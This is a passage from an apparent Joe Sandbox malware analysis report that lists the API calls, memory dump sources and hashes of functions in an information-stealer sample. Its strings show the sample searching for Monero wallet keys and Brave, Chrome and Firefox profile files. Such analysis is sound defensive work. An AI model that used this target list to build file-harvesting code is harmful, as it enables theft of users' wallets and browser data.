                              • Instruction Fuzzy Hash: 6EE012B595434153DE00B3F8AC4AB6A369CFB65385F041424FA09D6702FA25F802C66F

                              Non-executed Functions

                              Function 008B38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 008B38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B38E3
                              • lstrcat.KERNEL32(?,?), ref: 008B3935
                              • StrCmpCA.SHLWAPI(?,008C0F70), ref: 008B3947
                              • StrCmpCA.SHLWAPI(?,008C0F74), ref: 008B395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B3C67
                              • FindClose.KERNEL32(000000FF), ref: 008B3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 423416a42e588fd4cde2d72abbfd9a9742ddd6ef46146f103413a9381553c8ce
                              • Instruction ID: a537964d9717eae87f9807420d0253b0109070f0576256bda3cb1e5d799293ba
                              • Opcode Fuzzy Hash: 423416a42e588fd4cde2d72abbfd9a9742ddd6ef46146f103413a9381553c8ce
                              • Instruction Fuzzy Hash: C5A150B1A00258ABDB24DFA4DC85FEE7778FB59300F044588B51DD6241EB74AB85CF62
                              Function 008ABE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,008C0B32,008C0B2B,00000000,?,?,?,008C13F4,008C0B2A), ref: 008ABEF5
                              • StrCmpCA.SHLWAPI(?,008C13F8), ref: 008ABF4D
                              • StrCmpCA.SHLWAPI(?,008C13FC), ref: 008ABF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AC7BF
                              • FindClose.KERNEL32(000000FF), ref: 008AC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 3cb181106dc2143714da9fff38ba15157bbd4b72375a2ff9bdbfeec4e6176551
                              • Instruction ID: 045d0e61bbe8f9ba85a7f765f43726aa8b112e3675c39f34956134043da08184
                              • Opcode Fuzzy Hash: 3cb181106dc2143714da9fff38ba15157bbd4b72375a2ff9bdbfeec4e6176551
                              • Instruction Fuzzy Hash: D8424471910108ABDB18FBB4DC96EED737DFB54300F404568B50AE6691EE34AB49CBA3
                              Function 008B4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 008B492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B4943
                              • StrCmpCA.SHLWAPI(?,008C0FDC), ref: 008B4971
                              • StrCmpCA.SHLWAPI(?,008C0FE0), ref: 008B4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B4B7D
                              • FindClose.KERNEL32(000000FF), ref: 008B4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 37a8211af8832bebe236f8c31327bf42b6fef1ed3686ba873bdbed278993fca4
                              • Instruction ID: 20220101d80093af501a1525e016a42ecf25698155a93a8a49319ae1883cd1d8
                              • Opcode Fuzzy Hash: 37a8211af8832bebe236f8c31327bf42b6fef1ed3686ba873bdbed278993fca4
                              • Instruction Fuzzy Hash: 2C6122B1910218ABCB24EBE4DC85FEA777CFB58700F04858CB649D6141EA75EB858F92
                              Function 008B4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
                              • wsprintfA.USER32 ref: 008B45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B45BD
                              • StrCmpCA.SHLWAPI(?,008C0FC4), ref: 008B45EB
                              • StrCmpCA.SHLWAPI(?,008C0FC8), ref: 008B4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B468B
                              • FindClose.KERNEL32(000000FF), ref: 008B46A0
                              • lstrcat.KERNEL32(?,0142F0D8), ref: 008B46C5
                              • lstrcat.KERNEL32(?,0142D110), ref: 008B46D8
                              • lstrlen.KERNEL32(?), ref: 008B46E5
                              • lstrlen.KERNEL32(?), ref: 008B46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 717dd2415c0e56a4e92eda9be53aa0d3aab7b12a3ceef3fd3f344cc8632ad97a
                              • Instruction ID: f670dfc0e2ecbeb2ab2ffec243740e5e078d8819b65041b4f172fdfa597c7549
                              • Opcode Fuzzy Hash: 717dd2415c0e56a4e92eda9be53aa0d3aab7b12a3ceef3fd3f344cc8632ad97a
                              • Instruction Fuzzy Hash: 145156B59102189BDB24EBB4DC89FE9777CFB64300F404588B609D6191EF74AB85CF92
                              Function 008B3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 008B3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 008B3EDA
                              • StrCmpCA.SHLWAPI(?,008C0FAC), ref: 008B3F08
                              • StrCmpCA.SHLWAPI(?,008C0FB0), ref: 008B3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008B406C
                              • FindClose.KERNEL32(000000FF), ref: 008B4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 49f34f55e9b254fb9ee7f57bbd513b0afbf9cb575da7d422cd862490ba36d077
                              • Instruction ID: 8dfb8ce0b9c953336a1c92520c34058626e1f2f47457dd09806d4317d9ec5063
                              • Opcode Fuzzy Hash: 49f34f55e9b254fb9ee7f57bbd513b0afbf9cb575da7d422cd862490ba36d077
                              • Instruction Fuzzy Hash: C95145B6900218ABCB24EBB4DC85EEA777CFB54700F00458CB659D6140DB75EB86CF52
                              Function 00C6BA4D Relevance: 19.1, Strings: 14, Instructions: 1594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: n?o$2~^{$B|}$J~v$\6^f$\d?y$`U8'$zAw$|P$}\?$B_$Ek$\o_$wT
                              • API String ID: 0-2021813861
                              • Opcode ID: f1de7acf885e0d1c5797ee4d3da9ba2f44fca9ed0fa748615806d529d1f5f801
                              • Instruction ID: dc007a0bdcc966748144e0480215e973562676c383422d2cb251780808035754
                              • Opcode Fuzzy Hash: f1de7acf885e0d1c5797ee4d3da9ba2f44fca9ed0fa748615806d529d1f5f801
                              • Instruction Fuzzy Hash: CEB22AF39082049FE304AE2DDC8566AFBE9EF94720F1A4A3DE9C4D3744E63599058793
                              Function 008AED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 008AED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 008AED55
                              • StrCmpCA.SHLWAPI(?,008C1538), ref: 008AEDAB
                              • StrCmpCA.SHLWAPI(?,008C153C), ref: 008AEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AF2AE
                              • FindClose.KERNEL32(000000FF), ref: 008AF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: a4aa2eacbe95616077f1654266a5fbb51fb479fe52f96c1ef9e2602bfc2a89ba
                              • Instruction ID: 65c5054547cc38b3a23f184bbdef3623e51e96cc2efd95dadfd8c9fd09f26729
                              • Opcode Fuzzy Hash: a4aa2eacbe95616077f1654266a5fbb51fb479fe52f96c1ef9e2602bfc2a89ba
                              • Instruction Fuzzy Hash: 08E1C271911118AAEB68FB64DC91EEE7338FF54300F4045A9B51AE2552EE306F8ACF53
                              Function 008AF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C15B8,008C0D96), ref: 008AF71E
                              • StrCmpCA.SHLWAPI(?,008C15BC), ref: 008AF76F
                              • StrCmpCA.SHLWAPI(?,008C15C0), ref: 008AF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008AFAB1
                              • FindClose.KERNEL32(000000FF), ref: 008AFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 8310bcf1ca3c1350c5ae10234a4becf2f5e2fa2ddf2dc7b60a80f0c47243736d
                              • Instruction ID: 8ddaca6474c577d6884cf91786a9d75c365997ef946a355da4fafd8f384d9341
                              • Opcode Fuzzy Hash: 8310bcf1ca3c1350c5ae10234a4becf2f5e2fa2ddf2dc7b60a80f0c47243736d
                              • Instruction Fuzzy Hash: 17B14371900118ABDB28FF64DC95EEE7379FF55300F4081A8A50AD6692EF306B49CB93
                              Function 008A16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008C510C,?,?,?,008C51B4,?,?,00000000,?,00000000), ref: 008A1923
                              • StrCmpCA.SHLWAPI(?,008C525C), ref: 008A1973
                              • StrCmpCA.SHLWAPI(?,008C5304), ref: 008A1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008A1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 008A1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008A1E20
                              • FindClose.KERNEL32(000000FF), ref: 008A1E32
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: e6ecd7b2711d4ddf404c4e4cfbb383ad273fa3e7b46fb637d4b76744e1da06f9
                              • Instruction ID: 1ebb2f53ac2fd84ece084e723e1441204870c6c449a884d3b09e7ca83f1d2450
                              • Opcode Fuzzy Hash: e6ecd7b2711d4ddf404c4e4cfbb383ad273fa3e7b46fb637d4b76744e1da06f9
                              • Instruction Fuzzy Hash: E812E271910118AADB29EB64CCA5EEE7378FF54300F4041A9B516E6691EF306F89CF92
                              Function 008ADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008C0C2E), ref: 008ADE5E
